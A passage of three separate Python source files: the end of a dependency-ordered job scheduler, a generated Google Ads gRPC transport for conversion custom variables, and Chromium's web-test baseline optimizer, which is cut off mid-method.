        """Runs scheduled work, ensuring all dependencies for each element are done before
        execution.
        :param pool: A WorkerPool to run jobs on
        :param log: logger for logging debug information and progress
        submits all the work without any dependencies to the worker pool
        when a unit of work finishes,
        if it is successful
        calls success callback
        checks for dependees whose dependencies are all successful, and submits them
        if it fails
        calls failure callback
        marks dependees as failed and queues them directly into the finished work queue
        when all work is either successful or failed,
        cleans up the work pool
        if there's an exception on the main thread,
        calls failure callback for unfinished work
        aborts work pool
        re-raises
        """
        log.debug(self.format_dependee_graph())
        status_table = StatusTable(
            self._job_keys_as_scheduled,
            {key: len(self._jobs[key].dependencies) for key in self._job_keys_as_scheduled},
        )
        # Workers push (key, status, value, duration) results here; the main
        # thread is the only consumer.
        finished_queue = queue.Queue()
        heap = []
        jobs_in_flight = ThreadSafeCounter()
        def put_jobs_into_heap(job_keys):
            for job_key in job_keys:
                status_table.mark_queued(job_key)
                # minus because jobs with larger priority should go first
                heappush(heap, (-self._job_priority[job_key], job_key))
        def try_to_submit_jobs_from_heap():
            def worker(worker_key, work):
                # Runs on a pool thread; communicates back only via
                # finished_queue and the jobs_in_flight counter.
                status_table.mark_as(RUNNING, worker_key)
                try:
                    with Timer() as timer:
                        work()
                    result = (worker_key, SUCCESSFUL, None, timer.elapsed)
                except BaseException:
                    _, exc_value, exc_traceback = sys.exc_info()
                    result = (
                        worker_key,
                        FAILED,
                        (exc_value, traceback.format_tb(exc_traceback)),
                        timer.elapsed,
                    )
                finished_queue.put(result)
                jobs_in_flight.decrement()
            # Never queue more jobs than there are workers, so priorities keep
            # influencing what runs next.
            while len(heap) > 0 and jobs_in_flight.get() < pool.num_workers:
                priority, job_key = heappop(heap)
                jobs_in_flight.increment()
                pool.submit_async_work(Work(worker, [(job_key, (self._jobs[job_key]))]))
        def submit_jobs(job_keys):
            put_jobs_into_heap(job_keys)
            try_to_submit_jobs_from_heap()
        try:
            submit_jobs(self._job_keys_with_no_dependencies)
            while not status_table.are_all_done():
                try:
                    (finished_key, result_status, value, duration) = finished_queue.get(timeout=10)
                except queue.Empty:
                    # Periodic heartbeat: log progress and retry submission in
                    # case capacity freed up without a result arriving.
                    self.log_progress(log, status_table)
                    try_to_submit_jobs_from_heap()
                    continue
                finished_job = self._jobs[finished_key]
                finished_job.duration = duration
                direct_dependees = self._dependees[finished_key]
                status_table.mark_as(result_status, finished_key)
                # Queue downstream tasks.
                if result_status is SUCCESSFUL:
                    try:
                        finished_job.run_success_callback()
                    except Exception as e:
                        log.debug(traceback.format_exc())
                        raise ExecutionFailure(f"Error in on_success for {finished_key}", e)
                    ready_dependees = []
                    for dependee in direct_dependees:
                        status_table.mark_one_successful_dependency(dependee)
                        if status_table.is_ready_to_submit(dependee):
                            ready_dependees.append(dependee)
                    submit_jobs(ready_dependees)
                else:  # Failed or canceled.
                    try:
                        finished_job.run_failure_callback()
                    except Exception as e:
                        log.debug(traceback.format_exc())
                        raise ExecutionFailure(f"Error in on_failure for {finished_key}", e)
                    # Propagate failures downstream.
                    for dependee in direct_dependees:
                        if status_table.is_unstarted(dependee):
                            status_table.mark_queued(dependee)
                            finished_queue.put((dependee, CANCELED, None, 0))
                # Log success or failure for this job.
                if result_status is FAILED:
                    exception, tb = value
                    log.error(f"{finished_key} failed: {exception} in {finished_job.duration}")
                    if self._print_stack_trace:
                        log.error("Traceback:\n{}".format("\n".join(tb)))
                else:
                    log.debug(
                        "{} finished with status {} and in {}".format(
                            finished_key, result_status, finished_job.duration
                        )
                    )
        except ExecutionFailure:
            raise
        except Exception as e:
            # Call failure callbacks for jobs that are unfinished.
            for key, state in status_table.unfinished_items():
                self._jobs[key].run_failure_callback()
            log.debug(traceback.format_exc())
            raise ExecutionFailure("Error running job", e)
        if status_table.has_failures():
            raise ExecutionFailure(f"Failed jobs: {', '.join(status_table.failed_keys())}")
    def log_progress(self, log, status_table):
        """Debug-log the running/queued/unstarted job keys, one group per line."""
        running_jobs = sorted(i for (i, s) in status_table.unfinished_items() if s is RUNNING)
        queued_jobs = sorted(i for (i, s) in status_table.unfinished_items() if s is QUEUED)
        unstarted_jobs = sorted(i for (i, s) in status_table.unfinished_items() if s is UNSTARTED)
        log.debug(
            "Running ({}):\n  {}\n"
            "Queued ({}):\n  {}\n"
            "Unstarted ({}):\n  {}\n".format(
                len(running_jobs),
                "\n  ".join(running_jobs),
                len(queued_jobs),
                "\n  ".join(queued_jobs),
                len(unstarted_jobs),
                "\n  ".join(unstarted_jobs),
            )
        )
| |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.ads.googleads.v8.resources.types import conversion_custom_variable
from google.ads.googleads.v8.services.types import (
conversion_custom_variable_service,
)
from .base import ConversionCustomVariableServiceTransport, DEFAULT_CLIENT_INFO
class ConversionCustomVariableServiceGrpcTransport(
ConversionCustomVariableServiceTransport
):
"""gRPC backend transport for ConversionCustomVariableService.
Service to manage conversion custom variables.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
    def __init__(
        self,
        *,
        host: str = "googleads.googleapis.com",
        credentials: ga_credentials.Credentials = None,
        credentials_file: str = None,
        scopes: Sequence[str] = None,
        channel: grpc.Channel = None,
        api_mtls_endpoint: str = None,
        client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
        ssl_channel_credentials: grpc.ChannelCredentials = None,
        quota_project_id: Optional[str] = None,
        client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
    ) -> None:
        """Instantiate the transport.
        Args:
            host (Optional[str]):
                 The hostname to connect to.
            credentials (Optional[google.auth.credentials.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify the application to the service; if none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
                This argument is ignored if ``channel`` is provided.
            credentials_file (Optional[str]): A file with credentials that can
                be loaded with :func:`google.auth.load_credentials_from_file`.
                This argument is ignored if ``channel`` is provided.
            scopes (Optional(Sequence[str])): A list of scopes. This argument is
                ignored if ``channel`` is provided.
            channel (Optional[grpc.Channel]): A ``Channel`` instance through
                which to make calls.
            api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
                If provided, it overrides the ``host`` argument and tries to create
                a mutual TLS channel with client SSL credentials from
                ``client_cert_source`` or application default SSL credentials.
            client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
                Deprecated. A callback to provide client SSL certificate bytes and
                private key bytes, both in PEM format. It is ignored if
                ``api_mtls_endpoint`` is None.
            ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
                for grpc channel. It is ignored if ``channel`` is provided.
            quota_project_id (Optional[str]): An optional project to use for billing
                and quota.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.
        Raises:
            google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
                creation failed for any reason.
        """
        self._ssl_channel_credentials = ssl_channel_credentials
        if channel:
            # Sanity check: Ensure that channel and credentials are not both
            # provided.
            # NOTE: setting to False (not None) prevents the base constructor
            # from triggering application-default credential lookup.
            credentials = False
            # If a channel was explicitly provided, set it.
            self._grpc_channel = channel
            self._ssl_channel_credentials = None
        elif api_mtls_endpoint:
            # Deprecated mTLS path: derive host from the mTLS endpoint and
            # build a channel with client-certificate SSL credentials.
            warnings.warn(
                "api_mtls_endpoint and client_cert_source are deprecated",
                DeprecationWarning,
            )
            host = (
                api_mtls_endpoint
                if ":" in api_mtls_endpoint
                else api_mtls_endpoint + ":443"
            )
            if credentials is None:
                credentials, _ = google.auth.default(
                    scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id
                )
            # Create SSL credentials with client_cert_source or application
            # default SSL credentials.
            if client_cert_source:
                cert, key = client_cert_source()
                ssl_credentials = grpc.ssl_channel_credentials(
                    certificate_chain=cert, private_key=key
                )
            else:
                ssl_credentials = SslCredentials().ssl_credentials
            # create a new channel. The provided one is ignored.
            self._grpc_channel = type(self).create_channel(
                host,
                credentials=credentials,
                credentials_file=credentials_file,
                ssl_credentials=ssl_credentials,
                scopes=scopes or self.AUTH_SCOPES,
                quota_project_id=quota_project_id,
                options=[
                    ("grpc.max_send_message_length", -1),
                    ("grpc.max_receive_message_length", -1),
                ],
            )
            self._ssl_channel_credentials = ssl_credentials
        else:
            # Standard path: default host/credentials, optional explicit SSL
            # channel credentials.
            host = host if ":" in host else host + ":443"
            if credentials is None:
                credentials, _ = google.auth.default(scopes=self.AUTH_SCOPES)
            # create a new channel. The provided one is ignored.
            self._grpc_channel = type(self).create_channel(
                host,
                credentials=credentials,
                ssl_credentials=ssl_channel_credentials,
                scopes=self.AUTH_SCOPES,
                options=[
                    ("grpc.max_send_message_length", -1),
                    ("grpc.max_receive_message_length", -1),
                ],
            )
        self._stubs = {}  # type: Dict[str, Callable]
        # Run the base constructor.
        super().__init__(
            host=host, credentials=credentials, client_info=client_info,
        )
    @classmethod
    def create_channel(
        cls,
        host: str = "googleads.googleapis.com",
        credentials: Optional[ga_credentials.Credentials] = None,
        scopes: Optional[Sequence[str]] = None,
        **kwargs,
    ) -> grpc.Channel:
        """Create and return a gRPC channel object.
        Args:
            host (Optional[str]): The host for the channel to use.
            credentials (Optional[~.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify this application to the service. If
                none are specified, the client will attempt to ascertain
                the credentials from the environment.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
                service. These are only used when credentials are not specified and
                are passed to :func:`google.auth.default`.
            kwargs (Optional[dict]): Keyword arguments, which are passed to the
                channel creation.
        Returns:
            grpc.Channel: A gRPC channel object.
        """
        # Fall back to the class-level default scopes when none are given.
        return grpc_helpers.create_channel(
            host,
            credentials=credentials,
            scopes=scopes or cls.AUTH_SCOPES,
            **kwargs,
        )
    @property
    def grpc_channel(self) -> grpc.Channel:
        """Return the channel designed to connect to this service.

        The channel is created lazily by the constructor (or supplied by the
        caller) and cached on the instance; this accessor never creates one.
        """
        return self._grpc_channel
@property
def get_conversion_custom_variable(
self,
) -> Callable[
[conversion_custom_variable_service.GetConversionCustomVariableRequest],
conversion_custom_variable.ConversionCustomVariable,
]:
r"""Return a callable for the get conversion custom variable method over gRPC.
Returns the requested conversion custom variable.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `QuotaError <>`__ `RequestError <>`__
Returns:
Callable[[~.GetConversionCustomVariableRequest],
~.ConversionCustomVariable]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_conversion_custom_variable" not in self._stubs:
self._stubs[
"get_conversion_custom_variable"
] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v8.services.ConversionCustomVariableService/GetConversionCustomVariable",
request_serializer=conversion_custom_variable_service.GetConversionCustomVariableRequest.serialize,
response_deserializer=conversion_custom_variable.ConversionCustomVariable.deserialize,
)
return self._stubs["get_conversion_custom_variable"]
@property
def mutate_conversion_custom_variables(
self,
) -> Callable[
[
conversion_custom_variable_service.MutateConversionCustomVariablesRequest
],
conversion_custom_variable_service.MutateConversionCustomVariablesResponse,
]:
r"""Return a callable for the mutate conversion custom
variables method over gRPC.
Creates or updates conversion custom variables. Operation
statuses are returned.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `ConversionCustomVariableError <>`__
`DatabaseError <>`__ `HeaderError <>`__ `InternalError <>`__
`QuotaError <>`__ `RequestError <>`__
Returns:
Callable[[~.MutateConversionCustomVariablesRequest],
~.MutateConversionCustomVariablesResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "mutate_conversion_custom_variables" not in self._stubs:
self._stubs[
"mutate_conversion_custom_variables"
] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v8.services.ConversionCustomVariableService/MutateConversionCustomVariables",
request_serializer=conversion_custom_variable_service.MutateConversionCustomVariablesRequest.serialize,
response_deserializer=conversion_custom_variable_service.MutateConversionCustomVariablesResponse.deserialize,
)
return self._stubs["mutate_conversion_custom_variables"]
__all__ = ("ConversionCustomVariableServiceGrpcTransport",)
| |
# Copyright (C) 2011, Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import copy
import logging
from blinkpy.common.memoized import memoized
from blinkpy.web_tests.models.testharness_results import is_all_pass_testharness_result
_log = logging.getLogger(__name__)
class BaselineOptimizer(object):
    """Removes redundant baselines for a single web test.

    Baselines form a fallback graph: each port searches an ordered list of
    directories and uses the first baseline found. A baseline is redundant
    (and is deleted or promoted) when every port that would use it would see
    an identical result anyway. Virtual-suite baselines are handled by first
    making the virtual subtree self-contained, optimizing it independently,
    and finally removing duplication against the non-virtual subtree.
    """

    def __init__(self, host, default_port, port_names):
        """Initializes the optimizer.

        Args:
            host: A Host object providing the filesystem and the port factory.
            default_port: The Port whose conventions (baseline file naming,
                virtual suite lookup) are used throughout.
            port_names: Names of all ports whose baseline search paths should
                be taken into account.
        """
        self._filesystem = host.filesystem
        self._default_port = default_port
        self._ports = {}
        for port_name in port_names:
            self._ports[port_name] = host.port_factory.get(port_name)
        self._web_tests_dir = default_port.web_tests_dir()
        self._parent_of_tests = self._filesystem.dirname(self._web_tests_dir)
        self._web_tests_dir_name = self._filesystem.relpath(
            self._web_tests_dir, self._parent_of_tests)
        # Only used by unit tests.
        self.new_results_by_directory = []

    def optimize(self, test_name, suffix):
        """Optimizes the baselines of one test for one file suffix.

        Args:
            test_name: The (possibly virtual) test name.
            suffix: The baseline file extension WITHOUT the leading dot.

        Returns:
            True on success (including "nothing to do"), False if the
            consistency check in _optimize_subtree failed.
        """
        # A visualization of baseline fallback:
        # https://docs.google.com/drawings/d/13l3IUlSE99RoKjDwEWuY1O77simAhhF6Wi0fZdkSaMA/
        # The full document with more details:
        # https://chromium.googlesource.com/chromium/src/+/main/docs/testing/web_test_baseline_fallback.md
        # The virtual and non-virtual subtrees are identical, with the virtual
        # root being the special node having multiple parents and connecting the
        # two trees. We patch the virtual subtree to cut its dependencies on the
        # non-virtual one and optimize the two independently. Finally, we treat
        # the virtual subtree specially to remove any duplication between the
        # two subtrees.
        # For CLI compatibility, "suffix" is an extension without the leading
        # dot. Yet we use dotted extension everywhere else in the codebase.
        # TODO(robertma): Investigate changing the CLI.
        assert not suffix.startswith('.')
        extension = '.' + suffix
        baseline_name = self._default_port.output_filename(
            test_name, self._default_port.BASELINE_SUFFIX, extension)
        non_virtual_baseline_name = self._virtual_base(baseline_name)
        succeeded = True
        if non_virtual_baseline_name:
            # The baseline belongs to a virtual suite.
            _log.debug('Optimizing virtual fallback path.')
            self._patch_virtual_subtree(test_name, extension, baseline_name)
            succeeded &= self._optimize_subtree(test_name, baseline_name)
            self._optimize_virtual_root(test_name, extension, baseline_name)
        else:
            # The given baseline is already non-virtual.
            non_virtual_baseline_name = baseline_name
        _log.debug('Optimizing non-virtual fallback path.')
        succeeded &= self._optimize_subtree(test_name,
                                            non_virtual_baseline_name)
        self._remove_extra_result_at_root(test_name, non_virtual_baseline_name)
        if not succeeded:
            _log.error('Heuristics failed to optimize %s', baseline_name)
        return succeeded

    def write_by_directory(self, results_by_directory, writer, indent):
        """Logs results_by_directory in a pretty format."""
        for path in sorted(results_by_directory):
            writer('%s%s: %s' % (indent, self._platform(path),
                                 results_by_directory[path]))

    def read_results_by_directory(self, test_name, baseline_name):
        """Reads the baselines with the given file name in all directories.

        Returns:
            A dict from directory names to the digest of file content.
        """
        results_by_directory = {}
        directories = set()
        for port in self._ports.values():
            directories.update(set(self._relative_baseline_search_path(port)))
        for directory in directories:
            path = self._join_directory(directory, baseline_name)
            if self._filesystem.exists(path):
                results_by_directory[directory] = ResultDigest(
                    self._filesystem, path, self._is_reftest(test_name))
        return results_by_directory

    def _is_reftest(self, test_name):
        """Returns whether the test is a reftest (has reference files)."""
        return bool(self._default_port.reference_files(test_name))

    def _optimize_subtree(self, test_name, baseline_name):
        """Finds and applies the optimal baseline placement for one subtree.

        Returns:
            False if the sanity check found that the optimization would alter
            per-port results (a bug); True otherwise.
        """
        basename = self._filesystem.basename(baseline_name)
        results_by_directory, new_results_by_directory = self._find_optimal_result_placement(
            test_name, baseline_name)
        if new_results_by_directory == results_by_directory:
            if new_results_by_directory:
                _log.debug('  %s: (already optimal)', basename)
                self.write_by_directory(results_by_directory, _log.debug,
                                        '    ')
            else:
                _log.debug('  %s: (no baselines found)', basename)
            # This is just used for unit tests.
            # Intentionally set it to the old data if we don't modify anything.
            self.new_results_by_directory.append(results_by_directory)
            return True
        # Check if the results before and after optimization are equivalent.
        if (self._results_by_port_name(results_by_directory) !=
                self._results_by_port_name(new_results_by_directory)):
            # This really should never happen. Just a sanity check to make
            # sure the script fails in the case of bugs instead of committing
            # incorrect baselines.
            _log.error('  %s: optimization failed', basename)
            self.write_by_directory(results_by_directory, _log.warning,
                                    '    ')
            return False
        _log.debug('  %s:', basename)
        _log.debug('    Before: ')
        self.write_by_directory(results_by_directory, _log.debug, '      ')
        _log.debug('    After: ')
        self.write_by_directory(new_results_by_directory, _log.debug, '      ')
        self._move_baselines(baseline_name, results_by_directory,
                             new_results_by_directory)
        return True

    def _move_baselines(self, baseline_name, results_by_directory,
                        new_results_by_directory):
        """Applies a placement change: deletes old copies, writes new ones.

        All baseline contents are read into memory before anything is
        deleted, so a baseline can safely move between directories.
        """
        data_for_result = {}
        for directory, result in results_by_directory.items():
            if str(result) not in data_for_result:
                source = self._join_directory(directory, baseline_name)
                data_for_result[str(
                    result)] = self._filesystem.read_binary_file(source)
        fs_files = []
        for directory, result in results_by_directory.items():
            if new_results_by_directory.get(directory) != result:
                file_name = self._join_directory(directory, baseline_name)
                if self._filesystem.exists(file_name):
                    fs_files.append(file_name)
        if fs_files:
            _log.debug('    Deleting (file system):')
            for platform_dir in sorted(
                    self._platform(filename) for filename in fs_files):
                _log.debug('      ' + platform_dir)
            for filename in fs_files:
                self._filesystem.remove(filename)
        else:
            _log.debug('    (Nothing to delete)')
        file_names = []
        for directory, result in new_results_by_directory.items():
            if results_by_directory.get(directory) != result:
                destination = self._join_directory(directory, baseline_name)
                self._filesystem.maybe_make_directory(
                    self._filesystem.split(destination)[0])
                # NOTE(review): result.__str__() is just str(result), the same
                # key used when data_for_result was populated above.
                self._filesystem.write_binary_file(
                    destination, data_for_result[result.__str__()])
                file_names.append(destination)
        if file_names:
            _log.debug('    Adding:')
            for platform_dir in sorted(
                    self._platform(filename) for filename in file_names):
                _log.debug('      ' + platform_dir)
        else:
            _log.debug('    (Nothing to add)')

    def _platform(self, filename):
        """Guesses the platform from a path (absolute or relative).

        Returns:
            The platform name, or '(generic)' if unable to make a guess.
        """
        platform_dir = self._web_tests_dir_name + self._filesystem.sep + 'platform' + self._filesystem.sep
        # First try to match a path relative to the parent of the test dir.
        if filename.startswith(platform_dir):
            return filename.replace(platform_dir,
                                    '').split(self._filesystem.sep)[0]
        # Then try the same platform dir as an absolute path.
        platform_dir = self._filesystem.join(self._parent_of_tests,
                                             platform_dir)
        if filename.startswith(platform_dir):
            return filename.replace(platform_dir,
                                    '').split(self._filesystem.sep)[0]
        return '(generic)'

    def _port_from_baseline_dir(self, baseline_dir):
        """Returns a Port object from the given baseline directory."""
        baseline_dir = self._filesystem.basename(baseline_dir)
        for port in self._ports.values():
            if self._filesystem.basename(
                    port.baseline_version_dir()) == baseline_dir:
                return port
        raise Exception(
            'Failed to find port for primary baseline %s.' % baseline_dir)

    def _walk_immediate_predecessors_of_virtual_root(
            self, test_name, extension, baseline_name, worker_func):
        """Maps a function onto each immediate predecessor of the virtual root.

        For each immediate predecessor, we call
            worker_func(virtual_baseline, non_virtual_fallback)
        where the two arguments are the absolute paths to the virtual platform
        baseline and the non-virtual fallback respectively.
        """
        actual_test_name = self._virtual_base(test_name)
        assert actual_test_name, '%s is not a virtual test.' % test_name
        for directory in self._directories_immediately_preceding_root():
            port = self._port_from_baseline_dir(directory)
            virtual_baseline = self._join_directory(directory, baseline_name)
            # return_default=False mandates expected_filename() to return None
            # instead of a non-existing generic path when nothing is found.
            non_virtual_fallback = port.expected_filename(
                actual_test_name, extension, return_default=False)
            if not non_virtual_fallback:
                # Unable to find a non-virtual fallback baseline, skipping.
                continue
            worker_func(virtual_baseline, non_virtual_fallback)

    def _patch_virtual_subtree(self, test_name, extension, baseline_name):
        """Copies baselines into the virtual subtree to make it independent."""
        # Ensure all immediate predecessors of the root have a baseline for this
        # virtual suite so that the virtual subtree can be treated completely
        # independently. If an immediate predecessor is missing a baseline, find
        # its non-virtual fallback and copy over.
        _log.debug(
            'Copying non-virtual baselines to the virtual subtree to make it independent.'
        )
        virtual_root_baseline_path = self._filesystem.join(
            self._web_tests_dir, baseline_name)
        # A baseline at the virtual root already shields the subtree from the
        # non-virtual tree; nothing to patch in that case.
        if self._filesystem.exists(virtual_root_baseline_path):
            return

        def patcher(virtual_baseline, non_virtual_fallback):
            # Only copy when the virtual platform baseline is missing.
            if not self._filesystem.exists(virtual_baseline):
                _log.debug('  Copying (file system): %s -> %s.',
                           non_virtual_fallback, virtual_baseline)
                self._filesystem.maybe_make_directory(
                    self._filesystem.split(virtual_baseline)[0])
                self._filesystem.copyfile(non_virtual_fallback,
                                          virtual_baseline)

        self._walk_immediate_predecessors_of_virtual_root(
            test_name, extension, baseline_name, patcher)

    def _optimize_virtual_root(self, test_name, extension, baseline_name):
        """Removes the virtual root baseline or redundant virtual baselines."""
        virtual_root_baseline_path = self._filesystem.join(
            self._web_tests_dir, baseline_name)
        if self._filesystem.exists(virtual_root_baseline_path):
            _log.debug(
                'Virtual root baseline found. Checking if we can remove it.')
            self._try_to_remove_virtual_root(test_name, baseline_name,
                                             virtual_root_baseline_path)
        else:
            _log.debug(
                'Virtual root baseline not found. Searching for virtual baselines redundant with non-virtual ones.'
            )
            self._unpatch_virtual_subtree(test_name, extension, baseline_name)

    def _try_to_remove_virtual_root(self, test_name, baseline_name,
                                    virtual_root_baseline_path):
        """Deletes the virtual root baseline if it is redundant."""
        # See if all the successors of the virtual root (i.e. all non-virtual
        # platforms) have the same baseline as the virtual root. If so, the
        # virtual root is redundant and can be safely removed.
        virtual_root_digest = ResultDigest(self._filesystem,
                                           virtual_root_baseline_path,
                                           self._is_reftest(test_name))
        # Read the base (non-virtual) results.
        results_by_directory = self.read_results_by_directory(
            test_name, self._virtual_base(baseline_name))
        results_by_port_name = self._results_by_port_name(results_by_directory)
        for port_name in self._ports.keys():
            assert port_name in results_by_port_name
            if results_by_port_name[port_name] != virtual_root_digest:
                return
        _log.debug('Deleting redundant virtual root baseline.')
        _log.debug('  Deleting (file system): ' + virtual_root_baseline_path)
        self._filesystem.remove(virtual_root_baseline_path)

    def _unpatch_virtual_subtree(self, test_name, extension, baseline_name):
        """Deletes virtual baselines identical to their non-virtual fallback."""
        # Check all immediate predecessors of the virtual root and delete those
        # duplicate with their non-virtual fallback, essentially undoing some
        # of the work done in _patch_virtual_subtree.
        is_reftest = self._is_reftest(test_name)

        def unpatcher(virtual_baseline, non_virtual_fallback):
            if self._filesystem.exists(virtual_baseline) and \
                    (ResultDigest(self._filesystem, virtual_baseline, is_reftest) ==
                     ResultDigest(self._filesystem, non_virtual_fallback, is_reftest)):
                _log.debug(
                    '  Deleting (file system): %s (redundant with %s).',
                    virtual_baseline, non_virtual_fallback)
                self._filesystem.remove(virtual_baseline)

        self._walk_immediate_predecessors_of_virtual_root(
            test_name, extension, baseline_name, unpatcher)

    def _baseline_root(self):
        """Returns the name of the root (generic) baseline directory."""
        return self._web_tests_dir_name

    def _baseline_search_path(self, port):
        """Returns the baseline search path (a list of absolute paths) of the
        given port."""
        return port.baseline_search_path()

    @memoized
    def _relative_baseline_search_path(self, port):
        """Returns a list of paths to check for baselines in order.

        The generic baseline path is appended to the list. All paths are
        relative to the parent of the test directory.
        """
        baseline_search_path = self._baseline_search_path(port)
        relative_paths = [
            self._filesystem.relpath(path, self._parent_of_tests)
            for path in baseline_search_path
        ]
        relative_baseline_root = self._baseline_root()
        return relative_paths + [relative_baseline_root]

    def _virtual_base(self, baseline_name):
        """Returns the base (non-virtual) version of baseline_name, or None if
        baseline_name is not virtual."""
        # Note: port.lookup_virtual_test_base in fact expects a test_name,
        # but baseline_name also works here.
        return self._default_port.lookup_virtual_test_base(baseline_name)

    def _join_directory(self, directory, baseline_name):
        """Returns the absolute path to the baseline in the given directory."""
        return self._filesystem.join(self._parent_of_tests, directory,
                                     baseline_name)

    def _results_by_port_name(self, results_by_directory):
        """Transforms a by-directory result dict to by-port-name.

        The method mimicks the baseline search behaviour, i.e. results[port] is
        the first baseline found on the baseline search path of the port. If no
        baseline is found on the search path, the test is assumed to be an all-
        PASS testharness.js test.

        Args:
            results_by_directory: A dictionary returned by read_results_by_directory().

        Returns:
            A dictionary mapping port names to their baselines.
        """
        results_by_port_name = {}
        for port_name, port in self._ports.items():
            for directory in self._relative_baseline_search_path(port):
                if directory in results_by_directory:
                    results_by_port_name[port_name] = results_by_directory[
                        directory]
                    break
            if port_name not in results_by_port_name:
                # Implicit extra result.
                results_by_port_name[port_name] = ResultDigest(None, None)
        return results_by_port_name

    @memoized
    def _directories_immediately_preceding_root(self):
        """Returns a list of directories immediately preceding the root on
        search paths."""
        directories = set()
        for port in self._ports.values():
            directory = self._filesystem.relpath(
                self._baseline_search_path(port)[-1], self._parent_of_tests)
            directories.add(directory)
        return frozenset(directories)

    def _optimize_result_for_root(self, new_results_by_directory):
        """Promotes shared pre-root baselines into the root, in place."""
        # The root directory (i.e. web_tests) is the only one not
        # corresponding to a specific platform. As such, baselines in
        # directories that immediately precede the root on search paths may
        # be promoted up if they are all the same.
        # Example: if win and mac have the same baselines, then they can be
        # promoted up to be the root baseline.
        # All other baselines can only be removed if they're redundant with a
        # baseline later on the search path. They can never be promoted up.
        immediately_preceding_root = self._directories_immediately_preceding_root(
        )
        shared_result = None
        root_baseline_unused = False
        for directory in immediately_preceding_root:
            this_result = new_results_by_directory.get(directory)
            # If any of these directories don't have a baseline, there's no optimization we can do.
            if not this_result:
                return
            if not shared_result:
                shared_result = this_result
            elif shared_result != this_result:
                root_baseline_unused = True
        baseline_root = self._baseline_root()
        # The root baseline is unused if all the directories immediately preceding the root
        # have a baseline, but have different baselines, so the baselines can't be promoted up.
        if root_baseline_unused:
            if baseline_root in new_results_by_directory:
                del new_results_by_directory[baseline_root]
            return
        new_results_by_directory[baseline_root] = shared_result
        for directory in immediately_preceding_root:
            del new_results_by_directory[directory]

    def _find_optimal_result_placement(self, test_name, baseline_name):
        """Computes the minimal equivalent baseline placement.

        Returns:
            A (results_by_directory, new_results_by_directory) pair: the
            current placement and the optimized one.
        """
        results_by_directory = self.read_results_by_directory(
            test_name, baseline_name)
        results_by_port_name = self._results_by_port_name(results_by_directory)
        new_results_by_directory = self._remove_redundant_results(
            results_by_directory, results_by_port_name)
        self._optimize_result_for_root(new_results_by_directory)
        return results_by_directory, new_results_by_directory

    def _remove_redundant_results(self, results_by_directory,
                                  results_by_port_name):
        """Returns a copy of results_by_directory with duplicates removed."""
        # For every port, traverse its search path in the fallback order (from
        # specific to generic). Remove duplicate baselines until a different
        # baseline is found (or the root is reached), i.e., keep the most
        # generic one among duplicate baselines.
        new_results_by_directory = copy.copy(results_by_directory)
        for port_name, port in self._ports.items():
            current_result = results_by_port_name.get(port_name)
